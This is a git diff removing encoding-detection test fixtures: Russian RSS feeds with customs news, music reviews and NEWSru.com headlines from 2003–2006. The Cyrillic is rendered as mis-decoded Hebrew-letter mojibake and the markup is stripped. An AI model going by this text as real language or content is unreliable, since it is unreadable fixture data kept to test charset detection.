עוץםטךמ-גםוהנוםקוסךטו. - - - -װוהונאכםא עאלמזוםםא סכףזבא ג 2005 דמהף -http://money.rin.ru/content/news/?id=106318&from=rss -ֿמןמכםוםטו המץמהםמי קאסעט פוהונאכםמדמ ב‏הזועא מסעאגאכמס מהםטל טח גאזםוירטץ םאןנאגכוםטי הועוכםמסעט עאלמזוםםמי סכףזב ׀מססטט. ֲ 2005 ד., ןמ ןנוהגאנטעוכםל האםםל, עאלמזוםםלט מנדאםאלט ןונוקטסכוםמ ג המץמה פוהונאכםמדמ ב‏הזועא 2 ענטככטמםא 102,2 לטככטאנהא נףבכוי, קעמ סמסעאגטכמ 103% מע ךמםענמכםמדמ חאהאםט. - - - -ֻ‏בו ןכאם ןמ ןכוקף -http://money.rin.ru/content/news/?id=106317&from=rss -ׁ ץמנמרטל םאסענמוםטול גסענוקא‏ע ֽמגי דמה עאלמזוםםטךט ִאכםודמ ֲמסעמךא. ִכ ‎עמדמ וסע ץמנמרטי ןמגמה - הוךאבנסךטי ןכאם ןמ סבמנף עאלמזוםםץ ןכאעוזוי גןמכםום טלט םא 115 %. ֲ פוהונאכםי ב‏הזוע ןונוקטסכוםמ 9 לכנה. - - - -מםסףכעאעטגםי סמגוע נוראוע ט םובמכרטו גמןנמס, ט ךמםצוןעףאכםו ןנמבכול -http://money.rin.ru/content/news/?id=106316&from=rss -ֿמ סממבשוםט‏ ןנוסס-סכףזב ׂ׃ ׀װ, מקונוהםמו חאסוהאםטו מםסףכעאעטגםמדמ סמגועא ןמ נאבמעו ס ףקאסעםטךאלט ֲִ ןנט זםמל עאלמזוםםמל ףןנאגכוםטט סמסעמכמס ג הוךאבנו םא באחו ־־־ "ׂאדאםנמדסךטי אגעמלמבטכםי חאגמה". - - - -מככודט װׁׂ ׀מססטט נאססלמענוכא גמןנמס ןמהדמעמגךט ֿכאםא הויסעגטי ןמ נואכטחאצטט מםצוןצטט נאחגטעט עאלמזוםםץ מנדאםמג ׀מססטיסךמי װוהונאצטט -http://money.rin.ru/content/news/?id=106315&from=rss -29 הוךאבנ 2005 דמהא סמסעמכמס חאסוהאםטו ךמככודטט װוהונאכםמי עאלמזוםםמי סכףזב ׀מססטט, םא ךמעמנמל בכט נאססלמענום גמןנמס גנאבמעךט ןכאםא לונ ןמ נואכטחאצטט מםצוןצטט נאחגטעט עאלמזוםםץ מנדאםמג ׀מססטיסךמי װוהונאצטט םא 2006-2010 דמה, מהמבנוםםמי ֿנאגטעוכסעגמל ׀מססטיסךמי װוהונאצטט 8 הוךאבנ ס.ד. - - - -־ גסעףןכוםטט ג סטכף ןמסעאםמגכוםט ֿנאגטעוכסעגא ׀װ "־ נודףכטנמגאםטט טלןמנעא דמגהטם למנמזוםמי ג 2006 דמהף" -http://money.rin.ru/content/news/?id=106314&from=rss -ׁ 1 םגאנ 2006 דמהא גסעףןאוע ג סטכף ןמסעאםמגכוםטו ֿנאגטעוכסעגא ׀װ N 729 מע 5.12.2005 ד. "־ נודףכטנמגאםטט טלןמנעא דמגהטם למנמזוםמי ג 2006 דמהף ". ׁמדכאסםמ ןמסעאםמגכוםט‏, לום‏עס םאטלוםמגאםט ענוץ ןמהסףבןמחטצטי ֽׂ ֲִ (0202 30 100 3, 0202 30 500 3 ט 0202 30 900 3), ג ךמעמנו גךכ‏קאועס ףסכמגטו פנאםךמ-דנאםטצ סענאם גגמחא, א עאךזו ףסעאםאגכטגא‏עס םמגו סעאגךט גגמחםץ ןמרכטם סמדכאסםמ ןנטכמזוםט‏. - - - -גמע םא טלןמנע בףהףע טסןמכחמגאם ןמכםמסע‏ -http://money.rin.ru/content/news/?id=106313&from=rss -ׁ 1 םגאנ גסעףןאוע ג סטכף ןמסעאםמגכוםטו ֿנאגטעוכסעגא ׀װ "־ המןמכםטעוכםץ לונאץ ןמ נודףכטנמגאםט‏ טלןמנעא דמגהטם, סגטםטם ט לסא המלארםוי ןעטצ ג 2006 - 2009 דמהאץ" (N 733 מע 5.12.2005 ד.), ןנטחגאםםמו מבוסןוקטע ןמכםמו טסןמכחמגאםטו ךגמע םא טלןמנע ןונוקטסכוםםץ גטהמג ןנמהףךצטט. - - - -ׁםטזא‏עס סעאגךט ןמרכטם םא סגטםטםף -http://money.rin.ru/content/news/?id=106312&from=rss -ׁ 1 םגאנ 2006 דמהא גסעףןאוע ג סטכף ןמסעאםמגכוםטו ֿנאגטעוכסעגא ׀װ "־ נודףכטנמגאםטט טלןמנעא סגטםטם ג 2006 דמהף" (N 730 מע 05.12.2005 ד.), ףסעאםאגכטגא‏שוו סףללאנםי מבתול גגמחא ג ׀מססט‏ סגטםטם ג נאחלונו 476,1 עס. - - - -ׁןמנטע דנאלמעםמ ט ןמ הוכף -http://money.rin.ru/content/news/?id=106311&from=rss -ׁ 1 םגאנ 2006 דמהא גסעףןטע ג סטכף ןנטךאח װוהונאכםמי עאלמזוםםמי סכףזב "־ב מסןאנטגאםטט עאלמזוםםלט מנדאםאלט גסעףןטגרטץ ג חאךמםםף‏ סטכף סףהובםץ אךעמג אנבטענאזםץ סףהמג ג ןמנהךו םאהחמנא" (N 1080 מע 17 םמבנ 2005 דמהא). - - - - diff --git a/chardet/tests/windows-1251-cyrillic/music.peeps.ru.xml b/chardet/tests/windows-1251-cyrillic/music.peeps.ru.xml deleted file mode 100644 index 3c40b0d..0000000 --- a/chardet/tests/windows-1251-cyrillic/music.peeps.ru.xml +++ /dev/null @@ -1,112 +0,0 @@ - - - - - - ּףחךא םא PeePs.ru: נוצוםחטט - ֵזוהםוגםמו לףחךאכםמו טחהאםטו - http://music.peeps.ru - - - ּףחךא םא PeePs.ru - http://www.peeps.ru/banners/our/zn.gif - http://music.peeps.ru - 88 - 31 - - - - "SMASH!" - Freeway - http://music.peeps.ru/news/s/2003/03/19/1432.html - װאךע, קעמ בגרטו «ֽוןמסוה», א םםו «Smash!» גגאכטכטס ג ךמעוכ רמף-בטחםוסא בכאדמהאנ ןמבוהו ג ןנוסעטזםמל לףחךאכםמל ךמםךףנסו, םט ךמטל מבנאחמל םו ןמחגמכוע סעאגטע טץ ג מהטם ףנמגום ס «ִנףדטלט ןנאגטכאלט», «מנםלט» טכט «װאבנטךמי». ֲמ-ןונגץ, «Smash!» ןמ‏ע םא אםדכטיסךמל, גמ-געמנץ, ןמ‏ע ןנמסעמ חהמנמגמ! - - - - ֱ־ֻ״ְ ָׁׂ׀ְ 3 Artist : V / A - http://music.peeps.ru/news/s/2003/03/19/1431.html - ֲסול עוכוחנטעוכל, א עאךזו עוכוחנטעוכםטצאל! ֱכאדמהאנ סגמולף סבמנםטךף ט ןנמדנאללו «ֱמכרא סעטנךא» ְ.ּאכאץמג האנטע גוסוםםוו םאסענמוםטו! ֽא לאססמגף‏ «ׁעטנךף» ןנטדכארום המלמץמחיךט ְכסף ס ןוסםוי «ֲקונא», ׁגועא ס ץטעמל «ֲסו-עאךט למזםמ», ּארא ׀אסןףעטםא ס «ׁףלאסרוהרטל המזהול», ׂאם ֱףכאםמגא ס ענוךמל - - - - "BENEFIT" - http://music.peeps.ru/news/s/2003/03/19/1430.html - ׁכמגמ benefit ס אםדכטיסךמדמ מחםאקאוע «ןמכחא», «גדמהא». ׃ז םו חםא‏, םא סךמכךמ גדמהםמ בכמ ןנמה‏סונאל הף‎עא מסעאגכע ןכאסעטםךף בוח םאחגאםט, םמ עמ, קעמ סטםדכ «Sex Sells» המכדמ םו סןמכחאכ ס עמן-ןמחטצטי, גםמ םו מסעאגטכמ «Benefit» ג ןנמטדנרו. - - - - "־ְֵֽ ֵַָֻ" - ׁףןונסטלוענi - http://music.peeps.ru/news/s/2003/03/19/1429.html - ֿונגמו, קעמ בנמסאועס ג דכאחא - מבכמזךא הטסךא: ךכאגטרט פמנעוןטאםמ םא קונםמל פמםו - גטהטלמ, ‎עמ גנאזוםטו עמי סאלמי «סטללוענטט» ס ןנטסעאגךמי «סףןונ», מבנאחמגאםםמי ג םאחגאםטט אכבמלא. ֽמ, קעמ עאךמו סףןונסטללוענט? - - - - TLC 3D - http://music.peeps.ru/news/s/2003/03/19/1425.html - ֽמגי אכבמל אלונטךאםמך TLC 3D - קועגונעי ןמ סקועף ג הטסךמדנאפטט ענטמ. ֲ נוחףכעאעו ענאדטקוסךמי דטבוכט ג אגעמךאעאסענמפו מהםמי טח ףקאסעםטצ דנףןן ֻטח Left Eye ֻמןוס ענטמ ןנוגנאעטכמס ג הף‎ע. Chilli ט T-Boz נורטכט ןנמהמכזאע סמגלוסעםף‏ נאבמעף בוח ענועוי ףקאסעםטצ, םמ, וסעוסעגוםםמ, קעמ 3D ןמסגשום וו ןאלעט. - - - - DJ Tomekk - Beat Of Life, vol.1 - http://music.peeps.ru/news/s/2003/03/19/1424.html - ִטהזוי ׂמלוךך - לאסעונ וגנמןויסךמדמ ףנמגם, גסעףןאגרטי גלוסעו ס עאךטלט עטעאםאלט נ‎ןא, ךאך RunDMC, Wu-tang Clan, LL Cool J ט KRS-One, סהוכאגרטי נולטךס םא ןוסםט Brandy, Fugees ט האזו Jay-Z. ֲמע ט םמגי ודמ אכבמל - Beat Of Life vol.1 - - - - Dieter Bohlen - Greatest Hits - http://music.peeps.ru/news/s/2003/03/19/1423.html - ֲןףשוםםי ךמלןאםטוי BMG סבמנםטך כףקרטץ ןוסום ןוגצא, ךמלןמחטעמנא ט ןנמה‏סונא ִטעונא ֱמכוםא - נאהמסע הכ נמלאםעטקםץ ןמךכמםםטצ סכאהךמדמכמסמדמ םולצא. ִא ט םו עמכךמ הכ םטץ: סבמנםטך םוןנטעחאעוכםמי לוכמהטקםמי ןמן-לףחךט מעכטקםמ ןמהמיהוע הכ גוקונטםמך ס עאםצאלט. - - - - נףעמ ע ןמןאכ. װְֱ׀ְָ ֲִֵַַ - http://music.peeps.ru/news/s/2003/03/12/1366.html - װאבנטקםמו ןנמטחגמהסעגמ םו סעמטע םא לוסעו, א גץמהטע םא םמגו נוכס - «חגוחהאםףעו» «ךנףעמ ןמןאכט» עוןונ םו עמכךמ םא עג-‎ךנאם, םמ ט םא ךמלןאךע-הטסך. ׀וחףכעאע, דמגמנשטי סאל חא סוב - «פאבנטךא» טל. ּאעגטוםךמ נאבמעאוע סעאבטכםמ ט ןנמהףךעטגםמ. - - - - "ַגונט" - "דמכמה" - http://music.peeps.ru/news/s/2003/02/26/1293.html - 13 ענוךמג הוב‏עםמדמ אכבמלא דנףןן «ַגונט» ג צוכמל מסעאגכ‏ע ןנטעםמו גןוקאעכוםטו, םמ זו גנול םו ןמךטהאוע משףשוםטו םוךמעמנמדמ מהםממבנאחט. ֳהו-עמ םא סונוהטםו ןנמסכףרטגאםט הטסךא ןמגכועס משףשוםטו, קעמ טדנאוע מהםא ט עא זו ןוסם - - - - Moral Codex - The best - http://music.peeps.ru/news/s/2003/02/26/1292.html - ׁבמנםטך The Best, גןףשוםםי פטנלמי CD Land ג 2002 דמהף, ןנוהסעאגכוע סמבמי ןמהבמנךף כףקרטץ ץטעמג דנףןן «ּמנאכםי מהוךס». ִףלאועס, ל‎ענ «ּמנאכםי מהוךס» ג מסמבמל ןנוהסעאגכוםטט םו םףזהא‏עס. - - - - 'ׂום - 64' - '־בנגךט פנאח' - http://music.peeps.ru/news/s/2003/02/26/1291.html - ִוב‏עםי אכבמל דנףןן טח ֽמגמדמ ־סךמכא «ׂום - 64» ןמה םאחגאםטול «־בנגךט פנאח» מעלוקום גסומבשוי במכוחם‏ למכמהץ נמססטיסךטץ ךמלאםה: גנמהו ב ט דטעאנםו סמכמ ןנטסףעסעגף‏ע, ט גמךאכ ץמנמר, ט טדנא‏ע םוןכמץמ, ט ןוסםט סמקטם‏ע ךנאסטגו. - - - - Angelight - ִועט ־ךואםא - http://music.peeps.ru/news/s/2003/02/23/1257.html - ִמלמנמש¸םםו םוהמבנמזוכאעוכט לףחךט ם‏-‎יהז האגםמ ףזו מךנוסעטכט ו¸ םףהםמי, מהםממבנאחםמי ט בוססלסכוםםמי. ָ ‎עמ םוגחטנא םא עמ, קעמ סאלי ןמסכוהמגאעוכםי ו¸ נמססטיסךטי אהוןע Angelight ןנוסכוהףוע ךאזהל סגמטל אכבמלמל גןמכםו ךמםךנועםו צוכט. - - - - NOFX "Pump Up The Valuum" - http://music.peeps.ru/news/s/2003/02/11/1199.html - ֿמץמזו, המבטגרטס חגוחהםמדמ סעאעףסא, ט סעאג סגמודמ נמהא חאךמםמהאעוכלט זאםנא, NOFX נורטכט ןמכםמסע‏ ןמדנףחטעס ג הףנאךמגאכםטו ט סאלמןאנמהטנמגאםטו. ֻטנטךא עטןא: «She's got a silicone cock sticking in her ass  one in her cunt» טכט «there's nothing finer than having a vagina» גנהכט ןנטהועס ןמ גךףסף ףעמםקוםםל טםעוככוךעףאכאל, םמ קודמ ג ץמעוכט, ‎עמ זו גסו-עאךט ןאםך-נמך. - - - - No Use For A Name "More Betterness" CD - http://music.peeps.ru/news/s/2003/02/11/1198.html - ֿנמדנוססטנף ס ךאזהל םמגל אכבמלמל NUFN ןמץמזו המסעטדכט סמגונרוםסעגא. ֲ מעכטקטו מע במכרטםסעגא מהםממבנאחםמ גוסוכץ ןמן-ןאםך דנףןן, NUFN ךכאהףע ג מסםמג סגמוי לףחךט דנףסעםו לוכמהטט, ךמעמנו ג סמקועאםטט ןנמםטךםמגוםםל גמךאכמל ט לדךטל דטעאנםל חגףךמל ןנמטחגמהע םוטחדכאהטלמו גןוקאעכוםטו. - - - - Good Riddance "Operation phoenix" CD - http://music.peeps.ru/news/s/2003/02/11/1197.html - ׃האקםמ סמקועא עטןטקםמ ךאכטפמנםטיסךף‏ ןאםךמגסךף‏ לוכמהטקםמסע ס ףןנףדטל ץאנהךמנמגל חגףקאםטול (ג לףחךו) ט סמצטאכםמ-ןמכטעטקוסךף‏ עולאעטךף ס כטקםלט ןונוזטגאםטלט (ג עוךסעאץ), GR םו ג ןונגי נאח המךאחגא‏ע, קעמ גכ‏עס מהםמי טח סאלץ סטכםץ ט םוחאףנהםץ ןאםך-דנףןן 90-ץ. - - - - diff --git a/chardet/tests/windows-1251-cyrillic/newsru.com.xml b/chardet/tests/windows-1251-cyrillic/newsru.com.xml deleted file mode 100644 index 5faf1eb..0000000 --- a/chardet/tests/windows-1251-cyrillic/newsru.com.xml +++ /dev/null @@ -1,351 +0,0 @@ - - - - -NEWSru.com -http://www.newsru.com -ֽמגמסעט -ru -NEWSru.com, all rights reserved -info@newsru.com -Wed, 4 Jan 2006 05:45:00 +0300 - - http://newsru.com/img/ntv.gif - NEWSru.com - http://www.newsru.com - 115 - 28 - - - - ֲ ׂףנצטט ןסטץטקוסךט םוחהמנמגי לףזקטםא גחמנגאכ ץכמןףרךף ג חהאםטט ּטם‏סעא - http://www.newsru.com/world/03jan2006/ankara.html - ָםצטהוםע ןנמטחמרוכ םא מהםמל טח ‎עאזוי חהאםט ּטם‏סעא ג ְםךאנו, דהו נאסןמכמזוםמ ףןנאגכוםטו טסןמכםוםט םאךאחאםטי. ֲ ןמכטצטט ףגונ‏ע, קעמ ןנמטסרוהרוו םו גכועס עונאךעמל. ֲטםמגםטך ןנמטסרוסעגט חאהונזאם. - ֲ לטנו - Tue, 3 Jan 2006 19:57:00 +0300 - - - - - ֲ ֱֳִִָ מבושא‏ע םו רענאפמגאע ג םגאנו גמהטעוכוי חא םאנףרוםט םמגץ ןנאגטכ המנמזםמדמ הגטזוםט - http://www.newsru.com/russia/03jan2006/gibddnow.html - ֲ ןונגו םוהוכט םמגמדמ דמהא סמענףהםטךט ֱֳִִָ בףהףע כמכםמ מעםמסטעס ך גמהטעוכל, םו ףסןוגרטל גףקטע םמגו ןנאגטכא המנמזםמדמ הגטזוםט, גסעףןטגרטו ג סטכף ס 1 םגאנ 2006 דמהא. ָםסןוךעמנאל ֱֳִִָ ןנוהןטסאםמ מבתסםטע גמהטעוכ‏ סףע םאנףרוםט ט סהוכאע ולף ןנוהףןנוזהוםטו. - ֲ ׀מססטט - Tue, 3 Jan 2006 19:22:00 +0300 - - - - - ֲ ָנאךו נאחבטכס אלונטךאםסךטי גמוםםי גונעמכוע: הגמו ןמדטברטץ - http://www.newsru.com/world/03jan2006/heli.html - ֿמ האםםל טנאךסךמי ןמכטצטט, גונעמכוע ףןאכ טכט בכ סבטע גמ געמנםטך ןנטלונםמ ג 60 ךטכמלוענאץ סוגונמ-גמסעמקםוו ֱאדהאהא. ֲ נוחףכעאעו טםצטהוםעא ןמדטבכט הגמו גמוםםמסכףזאשטץ אנלטט ׁ״ְ. - ֲ לטנו - Tue, 3 Jan 2006 18:58:00 +0300 - - - - - ׀מססטיסךטו עוםםטסטסע םוףהאקםמ סעאנעמגאכט םא ףבךו ױמןלאםא - http://www.newsru.com/sport/03jan2006/hopman.html - ׁבמנםא ׀מססטט ןמ עוםםטסף ןנמטדנאכא סגמי סעאנעמגי לאעק םא ענאהטצטמםםמל םמגמדמהםול עףנםטנו ףבמך ױמןלאםא ס ןנטחמגל פמםהמל לטככטמם המככאנמג ׁ״ְ, ךמעמני ןנמץמהטע ג אגסענאכטיסךמל דמנמהו ֿונע. - ׁןמנע - Tue, 3 Jan 2006 18:32:00 +0300 - - - - - - - ֱמדאעו נמססטםךט הוכא‏ע מבמנמע ט מןנוהוכ‏ע סעטכ וגנמןויסךטץ המלמג למה - http://www.newsru.com/russia/03jan2006/women.html - נוסעםסךטו בכףח, לםמדמ לוץמג ט בנמסךטו ףךנארוםט - ג םםורםול סוחמםו במדאעו נמססטםךט הוכא‏ע מבמנמע ט מןנוהוכ‏ע סעטכ חאןאהםץ המלמג למה. ׀ףססךטו ס ףהמגמכסעגטול גסעאגכ‏ע סגמו במדאעסעגמ םאןמךאח, ןטרוע S&#252;ddeutsche Zeitung. - ֲ ׀מססטט - Tue, 3 Jan 2006 17:53:00 +0300 - - - - - ֲמ װנאםצטט ס 4 םגאנ מעלוםועס קנוחגקאיםמו ןמכמזוםטו, גגוהוםםמו ג סגחט ס לאססמגלט בוסןמנהךאלט - http://www.newsru.com/world/03jan2006/nochs.html - ׳נוחגקאיםמו ןמכמזוםטו בכמ גגוהוםמ גמ װנאםצטט 8 םמבנ 2005 דמהא ףךאחמל ןנוחטהוםעא סענאם ג סגחט ס לאססמגלט בוסןמנהךאלט ג ןנטדמנמהאץ ֿאנטזא, א 21 םמבנ ןאנכאלוםע ןנמהכטכ ודמ הויסעגטו םא ענט לוסצא. - ֲ לטנו - Tue, 3 Jan 2006 17:09:00 +0300 - - - - - ֲ ָנאךו ֲֲׁ ׁ״ְ מבסענוככט זטכמי המל: ןמדטבכא סול טח 14 קוכמגוך - http://www.newsru.com/world/03jan2006/iraq.html - ֿמ סכמגאל ןנוהסעאגטעוכ טנאךסךטץ ןנאגממץנאםטעוכםץ מנדאםמג, מבסענוכף ס גמחהףץא ןמהגונדס זטכמי המל ג דמנמהו ֱאיהזט םא סוגונו ָנאךא. ׁול טח 14 קוכמגוך, םאץמהטגראס ג המלו, ןמדטבכא. ֲ נוחףכעאעו מבסענוכא ושו ענט קוכמגוךא ןמסענאהאכט, םוסךמכךטל המלאל םאםוסום ףשונב. - ֲ לטנו - Tue, 3 Jan 2006 16:38:00 +0300 - - - - - ֲ ּטםסךו ןמ ןמהמחנוםט‏ ג פאכרטגמלמםועםטקוסעגו חאהונזאם סם ףבטעמי זףנםאכטסעךט ׳ונךאסמגמי - http://www.newsru.com/crime/03jan2006/minsk.html - ֲ מעםמרוםטט סםא ףבטעמי ג ךמםצו 2004 דמהא זףנםאכטסעךט ֲונמםטךט ׳ונךאסמגמי ְםעמםא װטכטלמםמגא ט ושו םוסךמכךטץ ודמ חםאךמלץ גמחבףזהוםמ ףדמכמגםמו הוכמ ןמ סע. 221 "ָחדמעמגכוםטו, ץנאםוםטו כטבמ סבע פאכרטגץ הוםוד טכט צוםםץ בףלאד". - נטלטםאכ - Tue, 3 Jan 2006 15:39:00 +0300 - - - - - ֽופעםו צום גנמסכט טח-חא דאחמגמדמ ךמםפכטךעא - http://www.newsru.com/finance/03jan2006/oil.html - ײום םא םופע םא מסםמגםץ לטנמגץ בטנזאץ גנמסכט טח-חא מחאבמקוםםמסעט ענויהונמג נמססטיסךמ-ףךנאטםסךטל דאחמגל ךמםפכטךעמל. ֽא ֽ‏-ֹמנךסךמי NYMEX באננוכ ןמהמנמזאכ םא 2,16 המככאנא - המ 63,2 המככאנא חא באננוכ. - ךמםמלטךא - Tue, 3 Jan 2006 15:28:00 +0300 - - - - - - - ֲ ׳וכבטםסךו לוסעםי זטעוכ ענובףוע מע סףהא נאחמבנאעס, מע ךמדמ מם ןנמטחמרוכ: מע ְהאל ט ֵג טכט מע מבוחם - http://www.newsru.com/russia/03jan2006/sered.html - ֶטעוכ ׳וכבטםסךא ֲאסטכטי ׁונוהמםטם, גסעףןא‏שטי מעגועקטךמל ג מהםמל טח סףהובםץ ןנמצוססמג, ץמהאעאיסעגמגאכ מב מעגמהו סףהט, למעטגטנף ‎עמ עול, קעמ מבא מםט ןנמטחמרכט מע ְהאלא ט ֵג, עמ וסע גכ‏עס נמהסעגוםםטךאלט. ־ם סקטעאוע, קעמ סףה המכזום ןנמסםטע ‎עמע גמןנמס. - ֲ ׀מססטט - Tue, 3 Jan 2006 15:15:00 +0300 - - - - - ֳנףחטם ס םמזמל אעאךמגאכ 20-לוענמגף‏ םאהףגםף‏ סמבאךף םא דכאגםמי ןכמשאהט ַףדהטהט (װ־ׂ־) - http://www.newsru.com/world/03jan2006/knifer.html - ׂולףנ מבאכט םוסךמכךמ נאח ןנמעךםףכ סמבאךף םמזמל, ןמסכו קודמ בכ חאהונזאם ןמכטצטוי. ־ם םו סלמד האע גםעםמדמ מבתסםוםט סגמולף ןמסעףןךף. ֵלף דנמחטע ענט דמהא ע‏נל. - ֲ לטנו - Tue, 3 Jan 2006 14:52:00 +0300 - - - - - - - - - ֲ אטנו מבנףרטכטס םוסךמכךמ זטכץ המלמג: ןמדטבכט 3 קוכמגוךא, 4 ןמכףקטכט נאםוםט - http://www.newsru.com/world/03jan2006/cairo.html - ָח-חא מבנףרוםט רוסעט- ט ענוץ‎עאזםמדמ זטכץ המלמג ג סעמכטצו ֵדטןעא חאגאכאלט מךאחאכס ןונוךנע ןמהתוחה הכ עוץםטךט. ֿנטקטםמי מבנףרוםט המלמג סעאכמ עמ, קעמ לוסעםו זטעוכט סענמע טץ טח סאלמהוכםמדמ ךטנןטקא, טחדמעמגכוםםמדמ טח ןנוססמגאםםמדמ לףסמנא. - ֲ לטנו - Tue, 3 Jan 2006 14:37:00 +0300 - - - - - ׀מססטםו םאחגאכט סאלו טםעונוסםו פטכל, ךםטדט, זףנםאכ ט עוכוןונוהאקט ג 2005 דמהף - http://www.newsru.com/cinema/03jan2006/best.html - ׃קאסעםטךט מןנמסא, ןנמגוהוםםמדמ ְםאכטעטקוסךטל צוםענמל נט ֻוגאה, ןמןעאכטס םאחגאע סאלי טםעונוסםי פטכל, ךםטדף, עוכוןנמדנאללף ט זףנםאכ. ֿנטלוקאעוכםמ, קעמ מסםמגםמי מעגוע םא גסו 4 גמןנמסא - "חאענףהם‏ס מעגועטע". - ףכעףנא - Tue, 3 Jan 2006 14:22:00 +0300 - - - - - - - ֲ םמגמל דמהף םא ּׁ למדףע מעלוםטע "סףץמי חאךמם" - http://www.newsru.com/russia/03jan2006/mks.html - -׃זו ןע כוע ס למלוםעא, ךמדהא ּׁ סעאכא מבטעאולמי, םא םוי הויסעגףוע זוסעמקאירטי חאןנוע םא אכךמדמכ. ֿמ סכףץאל, ןונגל ןמסכאבכוםטול סעאכא המסעאגךא םא במנע רמךמכאהםץ ךמםפוע ס כטךונמל. ֽמ האזו ‎עמ מפטצטאכםמ ןמהעגונהטע םוגמחלמזםמ, גוה םאנףרטעוכל דנמחטע םולוהכוםםמו ףגמכםוםטו. - ֲ ׀מססטט - Tue, 3 Jan 2006 13:48:00 +0300 - - - - - - - Maariv: ׃סאלא בום ֻאהום ףזו 3 דמהא זטגוע ג ָחנאטכו - http://www.newsru.com/world/03jan2006/laden.html - -ֳנאזהאםטם ְפדאםטסעאםא ׃סאלא בום ֻאהום גתוץאכ ג ָחנאטכ ןמ עףנטסעטקוסךמי גטחו קונוח דמה ט ענט הם ןמסכו עונאךעמג 11 סוםעבנ 2001 דמהא ג ׁ״ְ, ןונוה אלונטךאםסךטל געמנזוםטול ג ָנאך. ֵדמ גוחה טח ָחנאטכ םו בכ חאפטךסטנמגאם. - ֲ לטנו - Tue, 3 Jan 2006 13:32:00 +0300 - - - - - ׀מססטםו םאחגאכט סאלץ ףלםץ, סלוכץ ט סוךסףאכםץ ןמכטעטךמג סענאם - http://www.newsru.com/russia/03jan2006/politics.html - ְםאכטעטקוסךטי צוםענ נט ֻוגאה ןנמגוכ מןנמס סנוהט נמססטם ג ךמםצו 2005 דמהא. ׀וסןמםהוםע מעגועטכט םא גמןנמס מ סאלץ קוסעםץ, סלוכץ, ףלםץ ט סוךסףאכםץ ןמכטעטךאץ. ָלט סעאכט ֿףעטם ט ֶטנטםמגסךטי. נמלו עמדמ, נמססטםו םאחגאכט ׀מלאםא ְבנאלמגטקא סאלל במדאעל קוכמגוךמל סענאם. - ֲ ׀מססטט - Tue, 3 Jan 2006 13:05:00 +0300 - - - - - - - - ֲ Windows םאיהוםא מןאסםא ףחגטלמסע, ףדנמזא‏שא ןמקעט גסול ךמלן‏עונאל םא ןכאםועו - http://www.newsru.com/world/03jan2006/windows.html - ֻ‏במי טח לטככטמםמג ךמלן‏עונמג ןמה ףןנאגכוםטול ־ׁ Windows למזוע בע אעאךמגאם ןנלמ סויקאס, ןטרוע דאחועא Financial Times. ְעאךא ןנמטסץמהטע ןףעול גםוסוםט גנוהמםמסםמדמ ךמהא ג מבקםף‏ ךאנעטםךף. עמ לםמדמךנאעםמ ףגוכטקטגאוע מןאסםמסע חאנאזוםט. נמלו עמדמ, Microsoft ןמךא םו גןףסעטכא טסןנאגכוםטו, חאךנגא‏שוו "הנף". - ֲ לטנו - Tue, 3 Jan 2006 12:25:00 +0300 - - - - - - - Die Presse: ֿףעטם - גכאסעוכטם דמכףבמדמ מדם - http://www.newsru.com/russia/03jan2006/putingas.html - "ֳאחןנמל" &#8211; ‎עמ דכאגםמו מנףזטו ֿףעטםא ג במנבו חא גכטםטו ט גכאסע. ׁ עוץ ןמנ ךאך "ֳאחןנמל" ןנטמסעאםמגטכ סםאבזוםטו ׃ךנאטם ןנטנמהםל דאחמל, זטחם ג צוםענאכםמי הטסןועקונסךמי למםמןמכטט, םוסלמענ םא םמגמדמהםטו ןנאחהםטךט, בוע ךכ‏קמל. - ֲ ׀מססטט - Tue, 3 Jan 2006 12:13:00 +0300 - - - - - - - ָח ןףםךעא מבלוםא גאכ‏ע ג ּמסךגו ןמץטשוםמ 35 עסק המככאנמג - http://www.newsru.com/crime/03jan2006/grab.html - ִגמו םוטחגוסעםץ גוקונמל ג ןמםוהוכםטך סמגונרטכט נאחבמיםמו םאןאהוםטו םא ןףםךע מבלוםא גאכ‏ע םא ֱמנמגסךמל רמססו. אססטנא ףהאנטכט ןמ דמכמגו ט סגחאכט. - נטלטםאכ - Tue, 3 Jan 2006 12:03:00 +0300 - - - - - ֲ ׁ״ְ ךמע סןאס זטחם ץמחטםף, ןמחגמםטג ןמ עוכופמםף ג סכףזבף 911 - http://www.newsru.com/world/03jan2006/cat.html - 50 כועםטי ֳאננט ׀מרויחמם ףןאכ ס טםגאכטהםמדמ ךנוסכא ט םו למד ןמהםעס טח-חא סכףקטגרודמס לטךנמטםסףכעא. ױמחטם זטגמעםמדמ ןנטחםאכס, קעמ סןוצטאכםמ ןעאכס מבףקטע ךמעא םאזטלאע םא עוכופמםו ךםמןךף ןנלמדמ חגמםךא ג סכףזבף 911, םמ םטךאך םו נאססקטעגאכ, קעמ ךמע הויסעגטעוכםמ סלמזוע ‎עמ סהוכאע. - ֲ לטנו - Tue, 3 Jan 2006 11:42:00 +0300 - - - - - - - - - ֽולוצךא ןאנא חאלףנמגאכא ג בועמם הגףץ הועוי - http://www.newsru.com/crime/03jan2006/germanz.html - ׁ ןנטחםאםטול ג ןנאגממץנאםטעוכםו מנדאם גטכס לףזקטםא. ־ם סממבשטכ, קעמ ג סונוהטםו 1990-ץ דמהמג מם חאץמנמםטכ הגףץ הועוי ג ןמהגאכו המלא. ׂוכא הועוי בכט סןנעאם ג לףסמנםי ןאךוע ט חאלףנמגאם. - נטלטםאכ - Tue, 3 Jan 2006 11:24:00 +0300 - - - - - ִָּ מבגטםוע ׂבטכטסט ג נאסךנףקטגאםטט אםעטנמססטיסךמי ךאלןאםטט - http://www.newsru.com/russia/03jan2006/gruz.html - ׂבטכטסט נאסךנףקטגאוע אםעטנמססטיסךף‏ ךאלןאםט‏. ֳמגמנטע מ סנמךאץ ןמהןטסאםט נמססטיסךמ-דנףחטםסךמדמ ִמדמגמנא מ הנףזבו למזםמ עמכךמ ןמסכו םמנלאכטחאצטט אעלמספונ ג הגףסעמנמםםטץ מעםמרוםטץ, םאסעאטגאוע ִָּ. - ֲ ׀מססטט - Tue, 3 Jan 2006 11:04:00 +0300 - - - - - - - ׀אסעוע קטסכמ ןמדטברטץ ג נוחףכעאעו מבגאכא ךנרט ךאעךא ג ֱאגאנטט - http://www.newsru.com/world/03jan2006/de.html - ֿמ לונו ןנמהמכזוםט סןאסאעוכםץ נאבמע םא לוסעו מבנףרוםט ךנרט סןמנעךמלןכוךסא ג לוסעוקךו ֱאה ׀איץוםץאכ סןאסאעוכט טחגכוךא‏ע טח-ןמה חאגאכמג גסו םמגו עוכא. ֿמ ןמסכוהםטל האםםל, קטסכמ ןמדטברטץ המסעטדכמ 15 קוכמגוך. ֱמכוו 30 קוכמגוך ןמכףקטכט 